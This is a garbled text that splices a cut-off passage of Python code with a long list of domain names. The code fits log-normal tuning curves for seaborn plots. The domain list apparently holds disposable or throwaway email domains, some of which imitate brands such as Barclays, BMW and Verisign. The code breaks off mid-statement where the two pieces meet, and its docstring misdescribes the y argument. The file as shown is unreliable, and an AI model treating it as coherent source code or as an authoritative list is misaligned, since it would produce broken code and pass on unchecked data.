        # curve_fit failed to converge; warn with identifying metadata and skip this facet
        # since data is a Series, this is the best way to do this.
        idx = [i for i in data.iloc[0].index if i not in [x, y]]
        warnings.warn("The following was not well fit by a log Gaussian and so is"
                      " skipped:\n%s" % data.iloc[0][idx])
    else:
        # plot the fitted tuning curve over the binned x positions
        plt.plot(plot_data.index, tuning_curves.log_norm_pdf(plot_data.index, *popt), **kwargs)
def fit_log_norm_ci(x, y, ci_vals=[2.5, 97.5], **kwargs):
"""fit log norm to different bootstraps and plot the resulting mean and confidence interval.
to be used with seaborn.FacetGrid.map_dataframe.
because this goes through all the bootstraps and calculates their log normal tuning curves
separately, it's takes much more time than fit_log_norm
the data passed here must contain a column named `bootstrap_num`, which specifies which number
bootstrap the observation corresponds to. Each value of bootstrap_num will be fit
separately. It's recommended (i.e., this function was written assuming), therefore, that your
data only contains one y value per value of bootstrap_num and value of x.
x: string, column in data which contains the x values for this plot.
y: string, column in data which contains the x values for this plot.
ci_vals: 2-tuple or list of length 2 of floats, optional. the min and max percentile you wish
to plot as a shaded region. For example, if you wish to plot the 95% confidence interval, then
ci_vals=[2.5, 97.5] (the default); if you wish to plot the 68%, then ci_vals=[16, 84].
kwargs must contain `data`, the DataFrame with data to plot.
"""
data = kwargs.pop('data')
if 'color' in | |
"ayizkufailhjr.cf",
"ayizkufailhjr.ga",
"ayizkufailhjr.gq",
"ayizkufailhjr.ml",
"ayizkufailhjr.tk",
"ayuh.myvnc.com",
"azamat-farisovich.ru",
"azazazatashkent.tk",
"azcomputerworks.<EMAIL>",
"azest.us",
"azmeil.tk",
"azote.cf",
"azote.ga",
"azote.gq",
"azure.cloudns.asia",
"azxhzkohzjwvt6lcx.cf",
"azxhzkohzjwvt6lcx.ga",
"azxhzkohzjwvt6lcx.gq",
"azxhzkohzjwvt6lcx.ml",
"azxhzkohzjwvt6lcx.tk",
"b-sky-b.cf",
"b-sky-b.ga",
"b-sky-b.gq",
"b-sky-b.ml",
"b-sky-b.tk",
"b.cr.cloudns.asia",
"b.kerl.gq",
"b.reed.to",
"b.royal-syrup.tk",
"b1gmail.epicgamer.org",
"b1of96u.com",
"b1p5xtrngklaukff.cf",
"b1p5xtrngklaukff.ga",
"b1p5xtrngklaukff.gq",
"b1p5xtrngklaukff.tk",
"b2bx.net",
"b2email.win",
"b2g6anmfxkt2t.cf",
"b2g6anmfxkt2t.ga",
"b2g6anmfxkt2t.gq",
"b2g6anmfxkt2t.ml",
"b2g6anmfxkt2t.tk",
"b3nxdx6dhq.cf",
"b3nxdx6dhq.ga",
"b3nxdx6dhq.gq",
"b3nxdx6dhq.ml",
"b55b56.cf",
"b55b56.ga",
"b55b56.gq",
"b55b56.ml",
"b55b56.tk",
"b5safaria.com",
"b6o7vt32yz.cf",
"b6o7vt32yz.ga",
"b6o7vt32yz.gq",
"b6o7vt32yz.ml",
"b6o7vt32yz.tk",
"b6vscarmen.com",
"b6xh2n3p7ywli01.cf",
"b6xh2n3p7ywli01.ga",
"b6xh2n3p7ywli01.gq",
"b6xufbtfpqco.cf",
"b6xufbtfpqco.ga",
"b6xufbtfpqco.gq",
"b6xufbtfpqco.ml",
"b6xufbtfpqco.tk",
"b7ba4ef3a8f6.ga",
"b7t98zhdrtsckm.ga",
"b7t98zhdrtsckm.ml",
"b7t98zhdrtsckm.tk",
"b83gritty1eoavex.cf",
"b83gritty1eoavex.ga",
"b83gritty1eoavex.gq",
"b83gritty1eoavex.ml",
"b83gritty1eoavex.tk",
"b9adiv5a1ecqabrpg.cf",
"b9adiv5a1ecqabrpg.ga",
"b9adiv5a1ecqabrpg.gq",
"b9adiv5a1ecqabrpg.ml",
"b9adiv5a1ecqabrpg.tk",
"b9x45v1m.com",
"b9x45v1m.com.com",
"ba-ca.com",
"baban.ml",
"babau.cf",
"babau.ga",
"babau.gq",
"babau.ml",
"babe-store.com",
"babesstore.com",
"babirousa.ml",
"babiwatch.ru",
"babyk.gq",
"babylonize.com",
"babysmartwatchgps.ru",
"babywatches-q360.ru",
"bacapedia.web.id",
"backalleybowling.info",
"backmail.ml",
"backpack-mam.ru",
"bacninhmail.us",
"baconporker.com",
"baconsoi.tk",
"badamm.us",
"badgo.ru",
"badhus.org",
"badochka.ru",
"badoo.live",
"badpotato.tk",
"badutquinza.com",
"bae-systems.tk",
"bag-shopper.ru",
"bagmommy.ru",
"bagrgallery.ru",
"baikal-autotravel.ru",
"bakar.bid",
"bakhaus.ru",
"balanc3r.com",
"ballsofsteel.net",
"baltecosalon.ru",
"bandai.nom.co",
"bandamn.ru",
"bangilan.ga",
"bangilan.ml",
"bangsat.in",
"banhbeovodich.vn",
"banhga.cf",
"banhga.ga",
"banhga.ml",
"banikata.ru",
"banit.club",
"banit.me",
"banjarworo.ga",
"banjarworo.ml",
"banjarworocity.cf",
"bank-opros1.ru",
"bankomatt.ru",
"bankovskaya-karta-tele2.ru",
"banks-review.ru",
"bannedpls.online",
"bannerko.ru",
"baomoi.site",
"bapu.gq",
"bapu.ml",
"bapumoj.cf",
"bapumoj.ga",
"bapumoj.gq",
"bapumoj.ml",
"bapumoj.tk",
"baraccudacoach.ru",
"barbarrianking.com",
"barcakana.tk",
"barcalovers.club",
"barclays-plc.cf",
"barclays-plc.ga",
"barclays-plc.gq",
"barclays-plc.ml",
"barclays-plc.tk",
"bardecor.ru",
"bareck.net",
"bareed.ws",
"barenshop.ru",
"barrabravaz.com",
"barryogorman.com",
"barrypov.com",
"barryspov.com",
"bartoparcadecabinet.com",
"basakgidapetrol.com",
"basketball2in.com",
"basscode.org",
"basssi.today",
"bastore.co",
"basurtest55ckr.tk",
"basy.cf",
"batpeer.site",
"battle-royale-games.ru",
"battricks.com",
"bau-peler.business",
"bau-peler.com",
"bauimail.ga",
"bauwerke-online.com",
"baxomale.ht.cx",
"bazaorg.ru",
"bbbbyyzz.info",
"bbcs.me",
"bbetweenj.com",
"bbhost.us",
"bbmail.win",
"bbreghodogx83cuh.ml",
"bcaoo.com",
"bcast.ws",
"bccto.me",
"bcdmail.date",
"bcedetyam.ru",
"bcedetyam1.ru",
"bcedetyam2.ru",
"bcedetyam3.ru",
"bchatz.ga",
"bcompiled3.com",
"bcxaiws58b1sa03dz.cf",
"bcxaiws58b1sa03dz.ga",
"bcxaiws58b1sa03dz.gq",
"bcxaiws58b1sa03dz.ml",
"bcxaiws58b1sa03dz.tk",
"bdmuzic.pw",
"bea32.ru",
"bear.supappl.me",
"bearegone.pro",
"bears-rosessale.ru",
"beautifulmassage.ru",
"beautifulvideo.ru",
"beautyboo.ru",
"beautyboost.ru",
"becausethenight.cf",
"becausethenight.ml",
"becausethenight.tk",
"beck-it.net",
"beddly.com",
"beechatz.ga",
"beechatzz.ga",
"beed.ml",
"beefmilk.com",
"beeviee.cf",
"beeviee.ga",
"beeviee.gq",
"beeviee1.cf",
"beeviee1.ga",
"beeviee1.gq",
"beeviee1.ml",
"beeviee1.tk",
"bei.kr",
"beibleid.ru",
"beijinhuixin.com",
"beitmak.ru",
"bel.kr",
"belamail.org",
"belanjaonlineku.web.id",
"belastingdienst.pw",
"belediyeevleri2noluasm.com",
"belence.cf",
"belence.ga",
"belence.gq",
"belence.ml",
"belence.tk",
"belisatu.net",
"bellanotte.cf",
"belorus-kosmetix.ru",
"beluckygame.com",
"benefit-badgal.ru",
"beo.kr",
"beresleting.cf",
"beresleting.ga",
"beresleting.gq",
"beresleting.ml",
"beresleting.tk",
"bergmoneyclub.ru",
"beri-delay.ru",
"beriarenda.ru",
"beribase.ru",
"beribaza.ru",
"beridelo.ru",
"beriglobal.ru",
"berigroup.ru",
"beriinfo.ru",
"berirabotay.ru",
"berischool.ru",
"berishkola.ru",
"beristeam.ru",
"beritvorit.ru",
"beriudlugi.ru",
"beriuslugi.ru",
"berlusconi.cf",
"berlusconi.ga",
"berlusconi.gq",
"berlusconi.ml",
"bershka-terim.space",
"best-day.pw",
"best-pneumatics.ru",
"best-pnevmatic.ru",
"bestats.top",
"bestbanyabochka.ru",
"bestbyuaty.ru",
"bestchannelstv.info",
"bestchoiceofweb.club",
"bestday.pw",
"bestfakenews.xyz",
"bestfuture.pw",
"bestg1rls.ru",
"bestgifok.ru",
"bestglockner.com",
"besthendge.ru",
"bestintershop.ru",
"bestkitchens.fun",
"bestloot.tk",
"bestlucky.pw",
"bestmailgen.com",
"bestmogensen.com",
"bestoffworld.ru",
"bestofprice.co",
"bestparfum43.ru",
"bestpieter.com",
"bestshopcoupon.net",
"bestsoundeffects.com",
"besttandberg.com",
"besttempmail.com",
"besttrade24.ru",
"besttrommler.com",
"bestvpn.top",
"bestways.ga",
"bestwishes.pw",
"besun.cf",
"beta.tyrex.cf",
"betaprice.co",
"beteajah.ga",
"beteajah.gq",
"beteajah.ml",
"beteajah.tk",
"betemail.cf",
"betonchehov.ru",
"betsbest24.ru",
"beupmore.win",
"beverlytx.com",
"bezvodki.ru",
"bfo.kr",
"bfory.ru",
"bg4llrhznrom.cf",
"bg4llrhznrom.ga",
"bg4llrhznrom.gq",
"bg4llrhznrom.ml",
"bg4llrhznrom.tk",
"bgboad.ga",
"bgboad.ml",
"bgi-sfr-i.pw",
"bgisfri.pw",
"bgmilya.ru",
"bgsaddrmwn.me",
"bgtmail.com",
"bhadoomail.com",
"bhddmwuabqtd.cf",
"bhddmwuabqtd.ga",
"bhddmwuabqtd.gq",
"bhddmwuabqtd.ml",
"bhddmwuabqtd.tk",
"bho.hu",
"bho.kr",
"bhrpsck8oraayj.cf",
"bhrpsck8oraayj.ga",
"bhrpsck8oraayj.gq",
"bhrpsck8oraayj.ml",
"bhrpsck8oraayj.tk",
"bhuyarey.ga",
"bhuyarey.ml",
"bibbiasary.info",
"bibicaba.cf",
"bibicaba.ga",
"bibicaba.gq",
"bibicaba.ml",
"bibucabi.cf",
"bibucabi.ga",
"bibucabi.gq",
"bibucabi.ml",
"bidu.cf",
"bidu.gq",
"bidvmail.cf",
"big-phone.ru",
"big1.us",
"bigcrop.pro",
"biglive.asia",
"bigprofessor.so",
"bigstring.com",
"bigtetek.cf",
"bigtetek.ga",
"bigtetek.gq",
"bigtetek.ml",
"bigtetek.tk",
"bigtoken.cryptolovers.id",
"bigtuyul.me",
"bilri-car.ru",
"bim-aloman.ru",
"bimky.ru",
"bin.8191.at",
"bingakilo.ga",
"bingakilo.ml",
"bingzone.net",
"binka.me",
"binkmail.com",
"binnary.com",
"bio-muesli.net",
"bione.co",
"bioresonanthome.ru",
"biosoznanie.ru",
"birbakmobilya.com",
"birdsfly.press",
"biro.gq",
"biro.ml",
"biro.tk",
"biscutt.us",
"biskampus.ga",
"bit-degree.com",
"bit-led.ru",
"bit2tube.com",
"bitco-change.ru",
"bitcoini-bestchange.ru",
"bitconecct.ru",
"bitpost.site",
"bitwhites.top",
"bitymails.us",
"biz.st",
"bizimalem-support.de",
"bizkvadr.ru",
"bizsearch.info",
"biztime.tk",
"bjdhrtri09mxn.ml",
"bjmd.cf",
"bki7rt6yufyiguio.ze.am",
"bkkpkht.cf",
"bkkpkht.ga",
"bkkpkht.gq",
"bkkpkht.ml",
"bko.kr",
"bl.ctu.edu.gr",
"bl5ic2ywfn7bo.cf",
"bl5ic2ywfn7bo.ga",
"bl5ic2ywfn7bo.gq",
"bl5ic2ywfn7bo.ml",
"bl5ic2ywfn7bo.tk",
"black-latte24.ru",
"black-magi.ru",
"black-magick.ru",
"black-privoroti.ru",
"black-sharks.ru",
"blackbird.ws",
"blackbox-official.ru",
"blackgoldagency.ru",
"blackhole.djurby.se",
"blackhole.targeter.nl",
"blacklatte-natural.ru",
"blackmagi.ru",
"blackmagick.ru",
"blackprivoroti.ru",
"bladesmail.net",
"blakasuthaz52mom.tk",
"blan.tech",
"blangbling784yy.tk",
"blarakfight67dhr.ga",
"blinkmatrix.com",
"blip.ch",
"block-account.ru",
"blockdigichain.com",
"blog-stanislav.ru",
"blog5984.ru",
"bloggersxmi.com",
"blogmyway.org",
"blogodietax.ru",
"blogoworke.ru",
"blogsme.ru",
"blogspam.ro",
"bloompi.ru",
"bloqmental.ru",
"blqthexqfmmcsjc6hy.cf",
"blqthexqfmmcsjc6hy.ga",
"blqthexqfmmcsjc6hy.gq",
"blqthexqfmmcsjc6hy.ml",
"blqthexqfmmcsjc6hy.tk",
"bltzloto.ru",
"bluedumpling.info",
"bluewerks.com",
"blutig.me",
"bmpk.org",
"bmw-ag.cf",
"bmw-ag.ga",
"bmw-ag.gq",
"bmw-ag.ml",
"bmw-ag.tk",
"bmw-i8.gq",
"bmw-mini.cf",
"bmw-mini.ga",
"bmw-mini.gq",
"bmw-mini.ml",
"bmw-mini.tk",
"bmw-raspily.ru",
"bmw-rollsroyce.cf",
"bmw-rollsroyce.ga",
"bmw-rollsroyce.gq",
"bmw-rollsroyce.ml",
"bmw-rollsroyce.tk",
"bmw-x5.cf",
"bmw-x5.ga",
"bmw-x5.gq",
"bmw-x5.ml",
"bmw-x5.tk",
"bmw-x6.ga",
"bmw-x6.gq",
"bmw-x6.ml",
"bmw-x6.tk",
"bmw-z4.cf",
"bmw-z4.ga",
"bmw-z4.gq",
"bmw-z4.ml",
"bmw-z4.tk",
"bmwgroup.cf",
"bmwgroup.ga",
"bmwgroup.gq",
"bmwgroup.ml",
"bnckms.cf",
"bnckms.ga",
"bnckms.gq",
"bnckms.ml",
"bnghdg545gdd.gq",
"bnuis.com",
"bnv0qx4df0quwiuletg.cf",
"bnv0qx4df0quwiuletg.ga",
"bnv0qx4df0quwiuletg.gq",
"bnv0qx4df0quwiuletg.ml",
"bnv0qx4df0quwiuletg.tk",
"bo7uolokjt7fm4rq.cf",
"bo7uolokjt7fm4rq.ga",
"bo7uolokjt7fm4rq.gq",
"bo7uolokjt7fm4rq.ml",
"bo7uolokjt7fm4rq.tk",
"boastfusion.com",
"boatmail.us",
"bobablast.com",
"bobandvikki.club",
"bobby-unique.ru",
"bobmail.info",
"bobohieu.tk",
"bochkacraft.ru",
"bocil.tk",
"bodhi.lawlita.com",
"bodmod.ga",
"bofamily.ru",
"bofthew.com",
"bogotadc.info",
"bohani.cf",
"bohani.ga",
"bohani.gq",
"bohani.ml",
"bohani.tk",
"bohrer-shop.ru",
"boiler-stout.ru",
"bojogalax.ga",
"bokllhbehgw9.cf",
"bokllhbehgw9.ga",
"bokllhbehgw9.gq",
"bokllhbehgw9.ml",
"bokllhbehgw9.tk",
"bommails.ml",
"bon7.icu",
"bondrewd.cf",
"bongo.gq",
"bongobongo.cf",
"bongobongo.ga",
"bongobongo.ml",
"bongobongo.tk",
"bonobo.email",
"bonusfreerub.ru",
"bonuslier.ru",
"bonusoil.ru",
"bonw.icu",
"bookoneem.ga",
"booktoplady.com",
"bookyah.com",
"bootkp8fnp6t7dh.cf",
"bootkp8fnp6t7dh.ga",
"bootkp8fnp6t7dh.gq",
"bootkp8fnp6t7dh.ml",
"bootkp8fnp6t7dh.tk",
"bootstrade.ru",
"bootybay.de",
"boow.cf",
"boow.ga",
"boow.gq",
"boow.ml",
"boow.tk",
"borgish.com",
"boss.cf",
"botkaislove.ru",
"botz.online",
"boun.cr",
"bouncr.com",
"box.comx.cf",
"boxcoin-cach.ru",
"boxerstore2019.ru",
"boxformail.in",
"boximail.com",
"boxppy.ru",
"boxtemp.com.br",
"bp3xxqejba.cf",
"bp3xxqejba.ga",
"bp3xxqejba.gq",
"bp3xxqejba.ml",
"bp3xxqejba.tk",
"bpda.cn",
"bper.cf",
"bper.ga",
"bper.gq",
"bper.tk",
"bpvi.cf",
"bpvi.ga",
"bpvi.gq",
"bpvi.ml",
"bpvi.tk",
"bqc4tpsla73fn.cf",
"bqc4tpsla73fn.ga",
"bqc4tpsla73fn.gq",
"bqc4tpsla73fn.ml",
"bqc4tpsla73fn.tk",
"bqcoffee.ru",
"bqm2dyl.com",
"br6qtmllquoxwa.cf",
"br6qtmllquoxwa.ga",
"br6qtmllquoxwa.gq",
"br6qtmllquoxwa.ml",
"br6qtmllquoxwa.tk",
"brand-horse.ru",
"brand-love.ru",
"branden1121.club",
"brandlinza.ru",
"brank.io",
"bratfond.ru",
"bratwurst.dnsabr.com",
"braun4email.com",
"bravesite-info.ru",
"bravod.ru",
"breadtimes.press",
"breeze.eu.org",
"brefmail.com",
"brennendesreich.de",
"brgo.ru",
"brickoll.tk",
"briefkasten2go.de",
"bring-luck.pw",
"bringluck.pw",
"british-leyland.cf",
"british-leyland.ga",
"british-leyland.gq",
"british-leyland.ml",
"british-leyland.tk",
"brlotus.com",
"broadbandninja.com",
"brofamilys.ru",
"broilone.com",
"bronews.ru",
"browebstore.ru",
"brrvpuitu8hr.cf",
"brrvpuitu8hr.ga",
"brrvpuitu8hr.gq",
"brrvpuitu8hr.ml",
"brrvpuitu8hr.tk",
"brunhilde.ml",
"brunto.ru",
"bruson.ru",
"bs6bjf8wwr6ry.cf",
"bs6bjf8wwr6ry.ga",
"bs6bjf8wwr6ry.gq",
"bs6bjf8wwr6ry.ml",
"bsbhz1zbbff6dccbia.cf",
"bsbhz1zbbff6dccbia.ga",
"bsbhz1zbbff6dccbia.ml",
"bsbhz1zbbff6dccbia.tk",
"bsezjuhsloctjq.cf",
"bsezjuhsloctjq.ga",
"bsezjuhsloctjq.gq",
"bsezjuhsloctjq.ml",
"bsezjuhsloctjq.tk",
"bskvzhgskrn6a9f1b.cf",
"bskvzhgskrn6a9f1b.ga",
"bskvzhgskrn6a9f1b.gq",
"bskvzhgskrn6a9f1b.ml",
"bskvzhgskrn6a9f1b.tk",
"bskyb.cf",
"bskyb.ga",
"bskyb.gq",
"bskyb.ml",
"bsnow.net",
"bspamfree.org",
"bsquochoai.ga",
"bst-72.com",
"bsuakrqwbd.cf",
"bsuakrqwbd.ga",
"bsuakrqwbd.gq",
"bsuakrqwbd.ml",
"bsuakrqwbd.tk",
"bt-bitcoin.ru",
"bt0zvsvcqqid8.cf",
"bt0zvsvcqqid8.ga",
"bt0zvsvcqqid8.gq",
"bt0zvsvcqqid8.ml",
"bt0zvsvcqqid8.tk",
"bt3019k.com",
"btcmail.pw",
"btd4p9gt21a.cf",
"btd4p9gt21a.ga",
"btd4p9gt21a.gq",
"btd4p9gt21a.ml",
"btd4p9gt21a.tk",
"btemp.com",
"btgmka0hhwn1t6.cf",
"btgmka0hhwn1t6.ga",
"btgmka0hhwn1t6.ml",
"btgmka0hhwn1t6.tk",
"btintenet.com",
"btstr.lowbi.xyz",
"btukskkzw8z.cf",
"btukskkzw8z.ga",
"btukskkzw8z.gq",
"btukskkzw8z.ml",
"btukskkzw8z.tk",
"btz3kqeo4bfpqrt.cf",
"btz3kqeo4bfpqrt.ga",
"btz3kqeo4bfpqrt.ml",
"btz3kqeo4bfpqrt.tk",
"buatwini.tk",
"bucbdlbniz.cf",
"bucbdlbniz.ga",
"bucbdlbniz.gq",
"bucbdlbniz.ml",
"bucbdlbniz.tk",
"buccalmassage.ru",
"buchhandlung24.com",
"buckrubs.us",
"budaya-tionghoa.com",
"budayationghoa.com",
"budgetgoods.ru",
"budgjhdh73ctr.gq",
"budin.men",
"buffemail.com",
"bugmenot.com",
"bugmenot.ml",
"bui-in-samara.ru",
"buketeriya.ru",
"buketgurmana.ru",
"bukwos7fp2glo4i30.cf",
"bukwos7fp2glo4i30.ga",
"bukwos7fp2glo4i30.gq",
"bukwos7fp2glo4i30.ml",
"bukwos7fp2glo4i30.tk",
"buldozer-rent92.ru",
"bulkcleancheap.com",
"bullbeer.net",
"bullbeer.org",
"bullstore.net",
"bulrushpress.com",
"bum.net",
"bumppack.com",
"bumpymail.com",
"buncar.ru",
"bunchofidiots.com",
"bund.us",
"bundes-li.ga",
"bungabunga.cf",
"bunsenhoneydew.com",
"buntuty.cf",
"buntuty.ga",
"buntuty.ml",
"buon.club",
"buratin7.ru",
"bureslav.ru",
"burner-email.com",
"burnermail.io",
"burnmail.ca",
"burnthespam.info",
"burstmail.info",
"bus9alizaxuzupeq3rs.cf",
"bus9alizaxuzupeq3rs.ga",
"bus9alizaxuzupeq3rs.gq",
"bus9alizaxuzupeq3rs.ml",
"bus9alizaxuzupeq3rs.tk",
"buscarltd.com",
"bushnellofficial.ru",
"business-agent.info",
"business-goods.ru",
"businessagent.email",
"businessconstruction.ru",
"businesssource.net",
"businesssuccessislifesuccess.com",
"buspad.org",
"butrew.ru",
"butter9x.com",
"butterteddy.ru",
"buumew-auto.ru",
"buxap.com",
"buy-lp.ru",
"buy003.com",
"buyad.ru",
"buycow.org",
"buydfcat9893lk.cf",
"buygapfashion.com",
"buyprice.co",
"buyusedlibrarybooks.org",
"buzzcompact.com",
"buzzvirale.xyz",
"buzzzyaskz.site",
"bwa33.net",
"bwwsrvvff3wrmctx.cf",
"bwwsrvvff3wrmctx.ga",
"bwwsrvvff3wrmctx.gq",
"bwwsrvvff3wrmctx.ml",
"bwwsrvvff3wrmctx.tk",
"bx6r9q41bciv.cf",
"bx6r9q41bciv.ga",
"bx6r9q41bciv.gq",
"bx6r9q41bciv.ml",
"bx6r9q41bciv.tk",
"bx9puvmxfp5vdjzmk.cf",
"bx9puvmxfp5vdjzmk.ga",
"bx9puvmxfp5vdjzmk.gq",
"bx9puvmxfp5vdjzmk.ml",
"bx9puvmxfp5vdjzmk.tk",
"bxfmtktkpxfkobzssqw.cf",
"bxfmtktkpxfkobzssqw.ga",
"bxfmtktkpxfkobzssqw.gq",
"bxfmtktkpxfkobzssqw.ml",
"bxfmtktkpxfkobzssqw.tk",
"bxm2bg2zgtvw5e2eztl.cf",
"bxm2bg2zgtvw5e2eztl.ga",
"bxm2bg2zgtvw5e2eztl.gq",
"bxm2bg2zgtvw5e2eztl.ml",
"bxm2bg2zgtvw5e2eztl.tk",
"bxs1yqk9tggwokzfd.cf",
"bxs1yqk9tggwokzfd.ga",
"bxs1yqk9tggwokzfd.ml",
"bxs1yqk9tggwokzfd.tk",
"by8006l.com",
"byebyemail.com",
"bykov-stroj.ru",
"byom.de",
"bytik-flower.ru",
"bz-cons.ru",
"bzidohaoc3k.cf",
"bzidohaoc3k.ga",
"bzidohaoc3k.gq",
"bzidohaoc3k.ml",
"bzidohaoc3k.tk",
"bzmt6ujofxe3.cf",
"bzmt6ujofxe3.ga",
"bzmt6ujofxe3.gq",
"bzmt6ujofxe3.ml",
"bzmt6ujofxe3.tk",
"bztf1kqptryfudz.cf",
"bztf1kqptryfudz.ga",
"bztf1kqptryfudz.gq",
"bztf1kqptryfudz.ml",
"bztf1kqptryfudz.tk",
"bzymail.top",
"c-14.cf",
"c-14.ga",
"c-14.gq",
"c-14.ml",
"c-mail.cf",
"c-mail.gq",
"c.andreihusanu.ro",
"c.hcac.net",
"c.kadag.ir",
"c.kerl.gq",
"c.nut.emailfake.nut.cc",
"c.theplug.org",
"c.wlist.ro",
"c0rtana.cf",
"c0rtana.ga",
"c0rtana.gq",
"c0rtana.ml",
"c0rtana.tk",
"c0sau0gpflgqv0uw2sg.cf",
"c0sau0gpflgqv0uw2sg.ga",
"c0sau0gpflgqv0uw2sg.gq",
"c0sau0gpflgqv0uw2sg.ml",
"c0sau0gpflgqv0uw2sg.tk",
"c1oramn.com",
"c20vussj1j4glaxcat.cf",
"c20vussj1j4glaxcat.ga",
"c20vussj1j4glaxcat.gq",
"c20vussj1j4glaxcat.ml",
"c20vussj1j4glaxcat.tk",
"c3e3r7qeuu.cf",
"c3e3r7qeuu.ga",
"c3e3r7qeuu.gq",
"c3e3r7qeuu.ml",
"c3e3r7qeuu.tk",
"c3email.win",
"c4anec0wemilckzp42.ga",
"c4anec0wemilckzp42.ml",
"c4anec0wemilckzp42.tk",
"c4ster.gq",
"c4utar.cf",
"c4utar.ga",
"c4utar.gq",
"c4utar.ml",
"c4utar.tk",
"c51vsgq.com",
"c5ccwcteb76fac.cf",
"c5ccwcteb76fac.ga",
"c5ccwcteb76fac.gq",
"c5ccwcteb76fac.ml",
"c5ccwcteb76fac.tk",
"c5qawa6iqcjs5czqw.cf",
"c5qawa6iqcjs5czqw.ga",
"c5qawa6iqcjs5czqw.gq",
"c5qawa6iqcjs5czqw.ml",
"c5qawa6iqcjs5czqw.tk",
"c6h12o6.cf",
"c6h12o6.ga",
"c6h12o6.gq",
"c6h12o6.ml",
"c6h12o6.tk",
"c7fk799.com",
"c81hofab1ay9ka.cf",
"c81hofab1ay9ka.ga",
"c81hofab1ay9ka.gq",
"c81hofab1ay9ka.ml",
"c81hofab1ay9ka.tk",
"c99.me",
"ca.verisign.cf",
"ca.verisign.ga",
"ca.verisign.gq",
"cabekeriting99.com",
"cabonmania.ga",
"cabonmania.tk",
"cacanhbaoloc.com",
"cachedot.net",
"cad.edu.creo.tips",
"cad.edu.gr",
"cadillac-ats.tk",
"cahayasenja.online",
"cahkerjo.tk",
"cahsintru.cf",
"cakeonline.ru",
"cakk.us",
"camcum.ru",
"camping-grill.info",
"candymail.de",
"canggih.net",
"canitta.icu",
"cannoncrew.com",
"cantikmanja.online",
"canyouhearmenow.cf",
"caonima.gq",
"capital-capital.ru",
"capo-daca1.ru",
"car-arom.ru",
"car-fur.ru",
"car101.pro",
"caramail.pro",
"carbtc.net",
"careless-whisper.com",
"carins.io",
"carloszbs.ru",
"carrereclock.ru",
"cars2.club",
"carspost.ru",
"cartelera.org",
"caseedu.tk",
"casekoga.ru",
"casio-edu.cf",
"casio-edu.ga",
"casio-edu.gq",
"casio-edu.ml",
"casio-edu.tk",
"caspianfan.ir",
"casualdx.com",
"catch.everton.com",
"catchmeifyoucan.xyz",
"catchonline.ooo",
"cathead.ru",
"caugiay.tech",
"cavisto.ru",
"cax-aksmmor.ru",
"cazerumka.ru",
"cazzo.cf",
"cazzo.ga",
"cazzo.gq",
"cbair.com",
"cbdol.ru",
"cbgh.ddns.me",
"cbjr.tk",
"cc-s3x.cf",
"cc-s3x.ga",
"cc-s3x.gq",
"cc-s3x.ml",
"cc-s3x.tk",
"cc2ilplyg77e.cf",
"cc2ilplyg77e.ga",
"cc2ilplyg77e.gq",
"cc2ilplyg77e.ml",
"cc2ilplyg77e.tk",
"ccat.cf",
"ccat.ga",
"ccat.gq",
"ccgtoxu3wtyhgmgg6.cf",
"ccgtoxu3wtyhgmgg6.ga",
"ccgtoxu3wtyhgmgg6.gq",
"ccgtoxu3wtyhgmgg6.ml",
"ccgtoxu3wtyhgmgg6.tk",
"cchatz.ga",
"ccmail.men",
"cd2in.com",
"cdcmail.date",
"cdcovers.icu",
"cebolsarep.ga",
"cebong.cf",
"cebong.ga",
"cebong.gq",
"cebong.ml",
"cebong.tk",
"ceco3kvloj5s3.cf",
"ceco3kvloj5s3.ga",
"ceco3kvloj5s3.gq",
"ceco3kvloj5s3.ml",
"ceco3kvloj5s3.tk",
"ceftvhxs7nln9.cf",
"ceftvhxs7nln9.ga",
"ceftvhxs7nln9.gq",
"ceftvhxs7nln9.ml",
"ceftvhxs7nln9.tk",
"cekajahhs.tk",
"ceklaww.ml",
"cellphoneparts.tk",
"cellurl.com",
"centermail.com",
"centermail.net",
"centol.us",
"centr-fejerverkov28.ru",
"centr-luch.ru",
"centrallosana.ga",
"cetpass.com",
"ceweknakal.cf",
"ceweknakal.ga",
"ceweknakal.ml",
"cexkg50j6e.cf",
"cexkg50j6e.ga",
"cexkg50j6e.gq",
"cexkg50j6e.ml",
"cexkg50j6e.tk",
"cfskrxfnsuqck.cf",
"cfskrxfnsuqck.ga",
"cfskrxfnsuqck.gq",
"cfskrxfnsuqck.ml",
"cfskrxfnsuqck.tk",
"cghdgh4e56fg.ga",
"cgnz7xtjzllot9oc.cf",
"cgnz7xtjzllot9oc.ga",
"cgnz7xtjzllot9oc.gq",
"cgnz7xtjzllot9oc.ml",
"cgnz7xtjzllot9oc.tk",
"cgrtstm0x4px.cf",
"cgrtstm0x4px.ga",
"cgrtstm0x4px.gq",
"cgrtstm0x4px.ml",
"cgrtstm0x4px.tk",
"chacuo.net",
"chaichuang.com",
"chammy.info",
"champmails.com",
"chanelkirov43.ru",
"change-bitcoin.ru",
"changshutea-official.ru",
"channel9.cf",
"channel9.ga",
"channel9.gq",
"channel9.ml",
"chaonamdinh.com",
"chaosi0t.com",
"chauhanz.tk",
"cheaphub.net",
"cheatmail.de",
"chechnya.conf.work",
"cheesepin.info",
"chef.asana.biz",
"chernokk.ru",
"chery-clubs.ru",
"chewcow.com",
"chibakenma.ml",
"chickenkiller.com",
"chicpick.ru",
"chiefyagan.com",
"chielo.com",
"childrensclock.ru",
"chilepro.cc",
"chilkat.com",
"chinatov.com",
"chipbankasi.com",
"chipekii.cf",
"chipekii.ga",
"chipkolik.com",
"chistopole.ru",
"chithi.xyz",
"chitofficial.ru",
"chivasso.cf",
"chivasso.ga",
"chivasso.gq",
"chivasso.ml",
"chivasso.tk",
"chocklet.us",
"choco.la",
"chogmail.com",
"choicemail1.com",
"choiceoneem.ga",
"chokiwnl.men",
"chong-mail.com",
"chong-mail.net",
"chong-mail.org",
"choocho-telegram.ru",
"choosebitcash.ru",
"choqr6r4.com",
"chordguitar.us",
"chratechbeest.club",
"chris.burgercentral.us",
"christina365.cn",
"christopherfretz.com",
"chudosbor-yagodnica.ru",
"chukenpro.tk",
"chumpstakingdumps.com",
"ciberbrain.ru",
"cibernews.ru",
"cibidi.ru",
"cid.kr",
"cigar-auctions.com",
"cilemail.ga",
"cilo.us",
"cimkocar-lor.ru",
"cit-progress.ru",
"citadel-nn.ru",
"ciweltrust33deep.tk",
"cjpeg.com",
"cjuprf2tcgnhslvpe.cf",
"cjuprf2tcgnhslvpe.ga",
"cjuprf2tcgnhslvpe.gq",
"cjuprf2tcgnhslvpe.ml",
"cjuprf2tcgnhslvpe.tk",
"ck12.cf",
"ck12.ga",
"ck12.gq",
"ck12.ml",
"ck12.tk",
"ckaazaza.tk",
